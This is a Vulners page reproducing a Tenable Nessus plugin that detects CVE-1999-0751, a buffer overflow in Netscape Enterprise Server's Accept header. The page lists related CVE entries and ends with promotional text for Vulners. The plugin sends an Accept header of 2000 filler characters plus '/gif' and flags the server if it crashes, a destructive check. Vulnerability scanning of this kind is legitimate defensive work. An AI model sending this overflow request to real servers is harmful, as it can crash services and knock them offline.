| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
| CVE-1999-0751 | 4 Jan 200005:00 | – | cve | |
| CVE-1999-0751 | 4 Jan 200005:00 | – | cvelist | |
| EUVD-1999-0732 | 7 Oct 202500:30 | – | euvd | |
| CVE-1999-0751 | 13 Sep 199904:00 | – | nvd | |
| CVE-1999-0751 | 7 Jan 202609:41 | – | redhatcve |
| Source | Link |
|---|---|
| cve | www.cve.mitre.org/cgi-bin/cvename.cgi |
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(10154);
script_version("1.34");
script_cvs_date("Date: 2018/07/16 14:09:14");
script_cve_id("CVE-1999-0751");
script_bugtraq_id(631);
script_name(english:"Netscape Enterprise Server Accept Header Remote Overflow");
script_summary(english:"Attmept overflow with large Accept value.");
script_set_attribute(attribute:"synopsis", value:"The remote service is prone to a buffer overflow.");
script_set_attribute(attribute:"description", value:
"The remote web server seems to crash when it is issued a too long
argument to the 'Accept:' command :
Example :
GET / HTTP/1.0 Accept: <thousands of chars>/gif
This may allow an attacker to execute arbitrary code on the remote
system.");
script_set_attribute(attribute:"solution", value:"Upgrade to a version of Netscape Enterprise Server greater than 3.6.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"1999/09/13");
script_set_attribute(attribute:"plugin_publication_date", value:"1999/09/12");
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:netscape:enterprise_server");
script_end_attributes();
script_category(ACT_DESTRUCTIVE_ATTACK);
script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
script_family(english:"Web Servers");
script_dependencie("http_version.nasl");
script_require_keys("www/iplanet", "Settings/ParanoidReport");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
if (report_paranoia < 2) audit(AUDIT_PARANOID);
port = get_http_port(default:80);
if (http_is_dead(port:port))exit(0);
w = http_send_recv3(method:"GET", item: "/", port: port,
add_headers: make_array("Accept", crap(2000)+"/gif"));
if (isnull(w)) security_warning(port);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation